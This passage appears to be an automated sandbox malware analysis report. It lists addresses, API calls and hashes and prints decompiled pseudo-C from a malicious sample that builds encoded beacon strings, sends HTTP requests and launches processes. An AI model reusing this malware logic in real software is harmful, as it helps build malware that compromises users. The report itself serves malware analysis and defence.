            0x047e86e7
            0x047e86e9
            0x00000000
            0x00000000
            0x047e86f0
            0x047e86f2
            0x00000000
            0x00000000
            0x047e86f4
            0x047e86f8
            0x00000000
            0x00000000
            0x00000000
            0x047e86f8
            0x00000000
            0x00000000
            0x00000000
            0x047e85e3
            0x047e85e3
            0x047e85e3
            0x047e85ea
            0x00000000
            0x00000000
            0x047e85ec
            0x047e85ed
            0x047e85ef
            0x00000000
            0x00000000
            0x00000000
            0x047e85ef
            0x047e8617
            0x047e8619
            0x00000000
            0x00000000
            0x047e8629
            0x047e862b
            0x047e862d
            0x00000000
            0x00000000
            0x047e8633
            0x047e863a
            0x047e8666
            0x047e8666
            0x047e8668
            0x047e866a
            0x047e867e
            0x047e8680
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x047e866c
            0x047e866c
            0x047e866c
            0x047e8675
            0x047e8676
            0x047e8678
            0x047e867a
            0x047e867a
            0x00000000
            0x047e866c
            0x047e863c
            0x047e863c
            0x047e863f
            0x047e8641
            0x047e8653
            0x047e8653
            0x047e8656
            0x047e8658
            0x047e8658
            0x047e8659
            0x047e8659
            0x047e865f
            0x047e865f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x047e8643
            0x047e8643
            0x047e8643
            0x047e864a
            0x00000000
            0x00000000
            0x047e864c
            0x047e864c
            0x047e864d
            0x00000000
            0x00000000
            0x00000000
            0x047e864d
            0x047e864f
            0x047e8651
            0x047e8664
            0x00000000
            0x00000000
            0x00000000
            0x047e8664
            0x00000000
            0x047e8651
            0x047e85c3
            0x047e85c6
            0x047e85c9
            0x00000000
            0x00000000
            0x047e85cb
            0x047e85cd
            0x00000000
            0x00000000
            0x00000000
            0x047e85cd
            0x047e8592
            0x047e8594
            0x00000000
            0x00000000
            0x00000000
            0x00000000

            APIs
            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 047E8602
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: MemoryQueryVirtual
            • String ID:
            • API String ID: 2850889275-0
            • Opcode ID: af4e6450ccf0f7152a26077d9dc8f91846882e38aacb435e1f84a5767a3e981f
            • Instruction ID: 2f36054a6ca0cb02fa941724ffede459591b863e860284ccc701c266845d4456
            • Opcode Fuzzy Hash: af4e6450ccf0f7152a26077d9dc8f91846882e38aacb435e1f84a5767a3e981f
            • Instruction Fuzzy Hash: C361F431700601DFDB29EF6BC98067973A5FB8D354B268B29D416DB392E731F842C652
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E047E832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
            				intOrPtr _v8;
            				char _v12;
            				void* __ebp;
            				signed int* _t43;
            				char _t44;
            				void* _t46;
            				void* _t49;
            				intOrPtr* _t53;
            				void* _t54;
            				void* _t65;
            				long _t66;
            				signed int* _t80;
            				signed int* _t82;
            				void* _t84;
            				signed int _t86;
            				void* _t89;
            				void* _t95;
            				void* _t96;
            				void* _t99;
            				void* _t106;
            
            				_t43 = _t84;
            				_t65 = __ebx + 2;
            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
            				_t89 = _t95;
            				_t96 = _t95 - 8;
            				_push(_t65);
            				_push(_t84);
            				_push(_t89);
            				asm("cld");
            				_t66 = _a8;
            				_t44 = _a4;
            				if(( *(_t44 + 4) & 0x00000006) != 0) {
            					_push(_t89);
            					E047E8497(_t66 + 0x10, _t66, 0xffffffff);
            					_t46 = 1;
            				} else {
            					_v12 = _t44;
            					_v8 = _a12;
            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
            					_t86 =  *(_t66 + 0xc);
            					_t80 =  *(_t66 + 8);
            					_t49 = E047E8551(_t66);
            					_t99 = _t96 + 4;
            					if(_t49 == 0) {
            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
            						goto L11;
            					} else {
            						while(_t86 != 0xffffffff) {
            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
            							if(_t53 == 0) {
            								L8:
            								_t80 =  *(_t66 + 8);
            								_t86 = _t80[_t86 + _t86 * 2];
            								continue;
            							} else {
            								_t54 =  *_t53();
            								_t89 = _t89;
            								_t86 = _t86;
            								_t66 = _a8;
            								_t55 = _t54;
            								_t106 = _t54;
            								if(_t106 == 0) {
            									goto L8;
            								} else {
            									if(_t106 < 0) {
            										_t46 = 0;
            									} else {
            										_t82 =  *(_t66 + 8);
            										E047E843C(_t55, _t66);
            										_t89 = _t66 + 0x10;
            										E047E8497(_t89, _t66, 0);
            										_t99 = _t99 + 0xc;
            										E047E8533(_t82[2]);
            										 *(_t66 + 0xc) =  *_t82;
            										_t66 = 0;
            										_t86 = 0;
            										 *(_t82[2])(1);
            										goto L8;
            									}
            								}
            							}
            							goto L13;
            						}
            						L11:
            						_t46 = 1;
            					}
            				}
            				L13:
            				return _t46;
            			}























            0x047e8330
            0x047e8331
            0x047e8332
            0x047e8335
            0x047e8337
            0x047e833a
            0x047e833b
            0x047e833d
            0x047e833e
            0x047e833f
            0x047e8342
            0x047e834c
            0x047e83fd
            0x047e8404
            0x047e840d
            0x047e8352
            0x047e8352
            0x047e8358
            0x047e835e
            0x047e8361
            0x047e8364
            0x047e8368
            0x047e836d
            0x047e8372
            0x047e83f2
            0x00000000
            0x047e8374
            0x047e8374
            0x047e8380
            0x047e8382
            0x047e83dd
            0x047e83dd
            0x047e83e3
            0x00000000
            0x047e8384
            0x047e8393
            0x047e8395
            0x047e8396
            0x047e8397
            0x047e839a
            0x047e839a
            0x047e839c
            0x00000000
            0x047e839e
            0x047e839e
            0x047e83e8
            0x047e83a0
            0x047e83a0
            0x047e83a4
            0x047e83ac
            0x047e83b1
            0x047e83b6
            0x047e83c2
            0x047e83ca
            0x047e83d1
            0x047e83d7
            0x047e83db
            0x00000000
            0x047e83db
            0x047e839e
            0x047e839c
            0x00000000
            0x047e8382
            0x047e83f6
            0x047e83f6
            0x047e83f6
            0x047e8372
            0x047e8412
            0x047e8419

            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction ID: 1ad74d4aaddc240006c5acfa68b3f911fc3cd977eeb6c6d781eba4f65c51e9c5
            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction Fuzzy Hash: E021A4329002049FDB10EF69C8C49BBBBA5FF49350B468269D9559B345EB30F915CBE1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E047E2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
            				intOrPtr _v4;
            				signed int _v8;
            				int* _v12;
            				char* _v16;
            				intOrPtr _v20;
            				void* _v24;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				long _t68;
            				intOrPtr _t69;
            				intOrPtr _t70;
            				intOrPtr _t71;
            				intOrPtr _t72;
            				intOrPtr _t73;
            				void* _t76;
            				intOrPtr _t77;
            				int _t80;
            				intOrPtr _t81;
            				intOrPtr _t85;
            				intOrPtr _t86;
            				intOrPtr _t87;
            				void* _t89;
            				void* _t92;
            				intOrPtr _t96;
            				intOrPtr _t100;
            				intOrPtr* _t102;
            				int* _t108;
            				int* _t118;
            				char** _t120;
            				char* _t121;
            				intOrPtr* _t126;
            				intOrPtr* _t128;
            				intOrPtr* _t130;
            				intOrPtr* _t132;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				int _t142;
            				intOrPtr _t144;
            				int _t147;
            				intOrPtr _t148;
            				int _t151;
            				void* _t152;
            				intOrPtr _t166;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				void* _t171;
            				long _t172;
            				intOrPtr* _t173;
            				intOrPtr* _t174;
            				intOrPtr _t175;
            				intOrPtr* _t178;
            				char** _t181;
            				char** _t183;
            				char** _t184;
            				void* _t189;
            
            				_t68 = __eax;
            				_t181 =  &_v16;
            				_t152 = _a20;
            				_a20 = 8;
            				if(__eax == 0) {
            					_t68 = GetTickCount();
            				}
            				_t69 =  *0x47ea018; // 0x9e6833dc
            				asm("bswap eax");
            				_t70 =  *0x47ea014; // 0x3a87c8cd
            				asm("bswap eax");
            				_t71 =  *0x47ea010; // 0xd8d2f808
            				asm("bswap eax");
            				_t72 =  *0x47ea00c; // 0x13d015ef
            				asm("bswap eax");
            				_t73 =  *0x47ea348; // 0xc3d5a8
            				_t3 = _t73 + 0x47eb5ac; // 0x74666f73
            				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x47ea02c,  *0x47ea004, _t68);
            				_t76 = E047E467F();
            				_t77 =  *0x47ea348; // 0xc3d5a8
            				_t4 = _t77 + 0x47eb575; // 0x74707526
            				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
            				_t183 =  &(_t181[0xe]);
            				_t170 = _t169 + _t80;
            				if(_a24 != 0) {
            					_t148 =  *0x47ea348; // 0xc3d5a8
            					_t8 = _t148 + 0x47eb508; // 0x732526
            					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
            					_t183 =  &(_t183[3]);
            					_t170 = _t170 + _t151;
            				}
            				_t81 =  *0x47ea348; // 0xc3d5a8
            				_t10 = _t81 + 0x47eb89e; // 0x5428e46
            				_t153 = _t10;
            				_t189 = _a20 - _t10;
            				_t12 = _t81 + 0x47eb246; // 0x74636126
            				_t164 = 0 | _t189 == 0x00000000;
            				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
            				_t85 =  *0x47ea36c; // 0x54295b0
            				_t184 =  &(_t183[3]);
            				if(_t85 != 0) {
            					_t144 =  *0x47ea348; // 0xc3d5a8
            					_t16 = _t144 + 0x47eb8be; // 0x3d736f26
            					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t147;
            				}
            				_t86 = E047E472F(_t153);
            				_a32 = _t86;
            				if(_t86 != 0) {
            					_t139 =  *0x47ea348; // 0xc3d5a8
            					_t19 = _t139 + 0x47eb8d0; // 0x736e6426
            					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t142;
            					HeapFree( *0x47ea2d8, 0, _a40);
            				}
            				_t87 = E047E1340();
            				_a32 = _t87;
            				if(_t87 != 0) {
            					_t135 =  *0x47ea348; // 0xc3d5a8
            					_t23 = _t135 + 0x47eb8c5; // 0x6f687726
            					wsprintfA(_t171 + _t152, _t23, _t87);
            					_t184 =  &(_t184[3]);
            					HeapFree( *0x47ea2d8, 0, _a40);
            				}
            				_t166 =  *0x47ea3cc; // 0x5429600
            				_t89 = E047E6B59(0x47ea00a, _t166 + 4);
            				_t172 = 0;
            				_a16 = _t89;
            				if(_t89 == 0) {
            					L30:
            					HeapFree( *0x47ea2d8, _t172, _t152);
            					return _a44;
            				} else {
            					_t92 = RtlAllocateHeap( *0x47ea2d8, 0, 0x800);
            					_a24 = _t92;
            					if(_t92 == 0) {
            						L29:
            						HeapFree( *0x47ea2d8, _t172, _a8);
            						goto L30;
            					}
            					E047E2915(GetTickCount());
            					_t96 =  *0x47ea3cc; // 0x5429600
            					__imp__(_t96 + 0x40);
            					asm("lock xadd [eax], ecx");
            					_t100 =  *0x47ea3cc; // 0x5429600
            					__imp__(_t100 + 0x40);
            					_t102 =  *0x47ea3cc; // 0x5429600
            					_t168 = E047E6675(1, _t164, _t152,  *_t102);
            					asm("lock xadd [eax], ecx");
            					if(_t168 == 0) {
            						L28:
            						HeapFree( *0x47ea2d8, _t172, _a16);
            						goto L29;
            					}
            					StrTrimA(_t168, 0x47e9280);
            					_push(_t168);
            					_t108 = E047E7563();
            					_v12 = _t108;
            					if(_t108 == 0) {
            						L27:
            						HeapFree( *0x47ea2d8, _t172, _t168);
            						goto L28;
            					}
            					_t173 = __imp__;
            					 *_t173(_t168, _a8);
            					 *_t173(_a4, _v12);
            					_t174 = __imp__;
            					 *_t174(_v4, _v24);
            					_t175 = E047E6536( *_t174(_v12, _t168), _v20);
            					_v36 = _t175;
            					if(_t175 == 0) {
            						_v8 = 8;
            						L25:
            						E047E63F6();
            						L26:
            						HeapFree( *0x47ea2d8, 0, _v40);
            						_t172 = 0;
            						goto L27;
            					}
            					_t118 = E047E6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
            					_v12 = _t118;
            					if(_t118 == 0) {
            						_t178 = _v24;
            						_v20 = E047E597D(_t178, _t175, _v16, _v12);
            						_t126 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
            						_t128 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t128 + 8))(_t128);
            						_t130 =  *((intOrPtr*)(_t178 + 4));
            						 *((intOrPtr*)( *_t130 + 8))(_t130);
            						_t132 =  *_t178;
            						 *((intOrPtr*)( *_t132 + 8))(_t132);
            						E047E61DA(_t178);
            					}
            					if(_v8 != 0x10d2) {
            						L20:
            						if(_v8 == 0) {
            							_t120 = _v16;
            							if(_t120 != 0) {
            								_t121 =  *_t120;
            								_t176 =  *_v12;
            								_v16 = _t121;
            								wcstombs(_t121, _t121,  *_v12);
            								 *_v24 = E047E673A(_v16, _v16, _t176 >> 1);
            							}
            						}
            						goto L23;
            					} else {
            						if(_v16 != 0) {
            							L23:
            							E047E61DA(_v32);
            							if(_v12 == 0 || _v8 == 0x10d2) {
            								goto L26;
            							} else {
            								goto L25;
            							}
            						}
            						_v8 = _v8 & 0x00000000;
            						goto L20;
            					}
            				}
            			}






























































            0x047e2b91
            0x047e2b91
            0x047e2b95
            0x047e2b9c
            0x047e2ba6
            0x047e2ba8
            0x047e2ba8
            0x047e2bb5
            0x047e2bc0
            0x047e2bc3
            0x047e2bce
            0x047e2bd1
            0x047e2bd6
            0x047e2bd9
            0x047e2bde
            0x047e2be1
            0x047e2bed
            0x047e2bfa
            0x047e2bfc
            0x047e2c02
            0x047e2c07
            0x047e2c12
            0x047e2c14
            0x047e2c17
            0x047e2c1e
            0x047e2c20
            0x047e2c29
            0x047e2c34
            0x047e2c36
            0x047e2c39
            0x047e2c39
            0x047e2c3b
            0x047e2c40
            0x047e2c40
            0x047e2c48
            0x047e2c4c
            0x047e2c52
            0x047e2c5d
            0x047e2c5f
            0x047e2c64
            0x047e2c69
            0x047e2c6c
            0x047e2c71
            0x047e2c7c
            0x047e2c7e
            0x047e2c81
            0x047e2c81
            0x047e2c83
            0x047e2c8e
            0x047e2c94
            0x047e2c97
            0x047e2c9c
            0x047e2ca7
            0x047e2ca9
            0x047e2cb0
            0x047e2cba
            0x047e2cba
            0x047e2cbc
            0x047e2cc1
            0x047e2cc7
            0x047e2cca
            0x047e2ccf
            0x047e2cd9
            0x047e2cdb
            0x047e2cea
            0x047e2cea
            0x047e2cec
            0x047e2cfa
            0x047e2cff
            0x047e2d01
            0x047e2d07
            0x047e2ee7
            0x047e2eef
            0x047e2efc
            0x047e2d0d
            0x047e2d19
            0x047e2d1f
            0x047e2d25
            0x047e2eda
            0x047e2ee5
            0x00000000
            0x047e2ee5
            0x047e2d31
            0x047e2d36
            0x047e2d3f
            0x047e2d50
            0x047e2d54
            0x047e2d5d
            0x047e2d63
            0x047e2d70
            0x047e2d7d
            0x047e2d83
            0x047e2ecd
            0x047e2ed8
            0x00000000
            0x047e2ed8
            0x047e2d8f
            0x047e2d95
            0x047e2d96
            0x047e2d9b
            0x047e2da1
            0x047e2ec3
            0x047e2ecb
            0x00000000
            0x047e2ecb
            0x047e2dab
            0x047e2db2
            0x047e2dbc
            0x047e2dc2
            0x047e2dcc
            0x047e2dde
            0x047e2de0
            0x047e2de6
            0x047e2eff
            0x047e2eae
            0x047e2eae
            0x047e2eb3
            0x047e2ebf
            0x047e2ec1
            0x00000000
            0x047e2ec1
            0x047e2df1
            0x047e2df6
            0x047e2dfc
            0x047e2e07
            0x047e2e12
            0x047e2e16
            0x047e2e1c
            0x047e2e22
            0x047e2e28
            0x047e2e2b
            0x047e2e31
            0x047e2e34
            0x047e2e39
            0x047e2e3d
            0x047e2e3d
            0x047e2e4a
            0x047e2e58
            0x047e2e5d
            0x047e2e5f
            0x047e2e65
            0x047e2e6b
            0x047e2e6d
            0x047e2e72
            0x047e2e76
            0x047e2e92
            0x047e2e92
            0x047e2e65
            0x00000000
            0x047e2e4c
            0x047e2e51
            0x047e2e94
            0x047e2e98
            0x047e2ea2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x047e2ea2
            0x047e2e53
            0x00000000
            0x047e2e53
            0x047e2e4a

            APIs
            • GetTickCount.KERNEL32 ref: 047E2BA8
            • wsprintfA.USER32 ref: 047E2BF5
            • wsprintfA.USER32 ref: 047E2C12
            • wsprintfA.USER32 ref: 047E2C34
            • wsprintfA.USER32 ref: 047E2C5B
            • wsprintfA.USER32 ref: 047E2C7C
            • wsprintfA.USER32 ref: 047E2CA7
            • HeapFree.KERNEL32(00000000,?), ref: 047E2CBA
            • wsprintfA.USER32 ref: 047E2CD9
            • HeapFree.KERNEL32(00000000,?), ref: 047E2CEA
              • Part of subcall function 047E6B59: RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E6B75
              • Part of subcall function 047E6B59: RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E6B93
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E2D19
            • GetTickCount.KERNEL32 ref: 047E2D2B
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E2D3F
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E2D5D
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
              • Part of subcall function 047E6675: strcpy.NTDLL ref: 047E66BF
              • Part of subcall function 047E6675: lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
              • Part of subcall function 047E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7
            • StrTrimA.SHLWAPI(00000000,047E9280,?,05429600), ref: 047E2D8F
              • Part of subcall function 047E7563: lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
              • Part of subcall function 047E7563: lstrlen.KERNEL32(?), ref: 047E757B
              • Part of subcall function 047E7563: lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
              • Part of subcall function 047E7563: lstrcat.KERNEL32(00000000,?), ref: 047E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 047E2DB2
            • lstrcpy.KERNEL32(?,?), ref: 047E2DBC
            • lstrcat.KERNEL32(?,?), ref: 047E2DCC
            • lstrcat.KERNEL32(?,00000000), ref: 047E2DD3
              • Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
              • Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
              • Part of subcall function 047E6536: memset.NTDLL ref: 047E6578
            • wcstombs.NTDLL ref: 047E2E76
              • Part of subcall function 047E597D: SysAllocString.OLEAUT32(?), ref: 047E59B8
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • HeapFree.KERNEL32(00000000,?), ref: 047E2EBF
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047E2ECB
            • HeapFree.KERNEL32(00000000,?,?,05429600), ref: 047E2ED8
            • HeapFree.KERNEL32(00000000,?), ref: 047E2EE5
            • HeapFree.KERNEL32(00000000,?), ref: 047E2EEF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
            • String ID: Uet
            • API String ID: 1185349883-2766386878
            • Opcode ID: b0183d82b4dcceffd5d02c99bd320d54e8b761c0a35379de3d312ede195b0a5f
            • Instruction ID: 7073de73eb4a02edbc74763ca79cef038b39d79577a97ab7401413f5db48f6bb
            • Opcode Fuzzy Hash: b0183d82b4dcceffd5d02c99bd320d54e8b761c0a35379de3d312ede195b0a5f
            • Instruction Fuzzy Hash: BFA18C72500210AFD711DF66DC88EAA7BE8EF8C718F054A68F449DB221D739ED45CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E047E37DF(void* __eax, void* __ecx) {
            				long _v8;
            				char _v12;
            				void* _v16;
            				void* _v28;
            				long _v32;
            				void _v104;
            				char _v108;
            				long _t36;
            				intOrPtr _t40;
            				intOrPtr _t47;
            				intOrPtr _t50;
            				void* _t58;
            				void* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t71;
            
            				_t1 = __eax + 0x14; // 0x74183966
            				_t69 =  *_t1;
            				_t36 = E047E6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
            				_v8 = _t36;
            				if(_t36 != 0) {
            					L12:
            					return _v8;
            				}
            				E047E7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
            				_t40 = _v12(_v12);
            				_v8 = _t40;
            				if(_t40 == 0 && ( *0x47ea300 & 0x00000001) != 0) {
            					_v32 = 0;
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					_v108 = 0;
            					memset( &_v104, 0, 0x40);
            					_t47 =  *0x47ea348; // 0xc3d5a8
            					_t18 = _t47 + 0x47eb706; // 0x73797325
            					_t68 = E047E127E(_t18);
            					if(_t68 == 0) {
            						_v8 = 8;
            					} else {
            						_t50 =  *0x47ea348; // 0xc3d5a8
            						_t19 = _t50 + 0x47eb86c; // 0x5428e14
            						_t20 = _t50 + 0x47eb3f6; // 0x4e52454b
            						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
            						if(_t71 == 0) {
            							_v8 = 0x7f;
            						} else {
            							_v108 = 0x44;
            							E047E5B56();
            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
            							_push(1);
            							E047E5B56();
            							if(_t58 == 0) {
            								_v8 = GetLastError();
            							} else {
            								CloseHandle(_v28);
            								CloseHandle(_v32);
            							}
            						}
            						HeapFree( *0x47ea2d8, 0, _t68);
            					}
            				}
            				_t70 = _v16;
            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
            				E047E61DA(_t70);
            				goto L12;
            			}


















            0x047e37e7
            0x047e37e7
            0x047e37f6
            0x047e37fd
            0x047e3802
            0x047e390f
            0x047e3916
            0x047e3916
            0x047e3811
            0x047e3819
            0x047e381c
            0x047e3821
            0x047e3836
            0x047e383c
            0x047e383d
            0x047e3840
            0x047e3846
            0x047e3849
            0x047e384e
            0x047e3856
            0x047e3862
            0x047e3866
            0x047e38f6
            0x047e386c
            0x047e386c
            0x047e3871
            0x047e3878
            0x047e388c
            0x047e3890
            0x047e38df
            0x047e3892
            0x047e3893
            0x047e389a
            0x047e38b3
            0x047e38b5
            0x047e38b9
            0x047e38c0
            0x047e38da
            0x047e38c2
            0x047e38cb
            0x047e38d0
            0x047e38d0
            0x047e38c0
            0x047e38ee
            0x047e38ee
            0x047e3866
            0x047e38fd
            0x047e3906
            0x047e390a
            0x00000000

            APIs
              • Part of subcall function 047E6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047E37FB,?,?,?,?,00000000,00000000), ref: 047E6C1E
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047E6C40
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 047E6C56
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047E6C6C
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047E6C82
              • Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047E6C98
            • memset.NTDLL ref: 047E3849
              • Part of subcall function 047E127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,047E3862,73797325), ref: 047E128F
              • Part of subcall function 047E127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047E12A9
            • GetModuleHandleA.KERNEL32(4E52454B,05428E14,73797325), ref: 047E387F
            • GetProcAddress.KERNEL32(00000000), ref: 047E3886
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E38EE
              • Part of subcall function 047E5B56: GetProcAddress.KERNEL32(36776F57,047E2425), ref: 047E5B71
            • CloseHandle.KERNEL32(00000000,00000001), ref: 047E38CB
            • CloseHandle.KERNEL32(?), ref: 047E38D0
            • GetLastError.KERNEL32(00000001), ref: 047E38D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3075724336-1616585941
            • Opcode ID: 37a70927e899804c2665bb0a0564ded16c4102f6741edbf5a0ad0f77eef7d1e7
            • Instruction ID: 9eaa990b753494d6a9a659fc8e95d3ec5d7d13cfe6a3cdc964ef0af67ddc68d6
            • Opcode Fuzzy Hash: 37a70927e899804c2665bb0a0564ded16c4102f6741edbf5a0ad0f77eef7d1e7
            • Instruction Fuzzy Hash: 9D3114B2900209AFDB10EFE6DC88DEE7BBCEB0C318F114665E605A7211D735AD45DB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E3FA5(void* __ecx, void* __esi) {
            				long _v8;
            				long _v12;
            				long _v16;
            				long _v20;
            				long _t34;
            				long _t39;
            				long _t42;
            				long _t56;
            				void* _t58;
            				void* _t59;
            				void* _t61;
            
            				_t61 = __esi;
            				_t59 = __ecx;
            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
            				do {
            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
            					_v20 = _t34;
            					if(_t34 != 0) {
            						L3:
            						_v8 = 4;
            						_v16 = 0;
            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
            							_t39 = GetLastError();
            							_v12 = _t39;
            							if(_v20 == 0 || _t39 != 0x2ef3) {
            								L15:
            								return _v12;
            							} else {
            								goto L11;
            							}
            						}
            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
            							goto L11;
            						} else {
            							_v16 = 0;
            							_v8 = 0;
            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
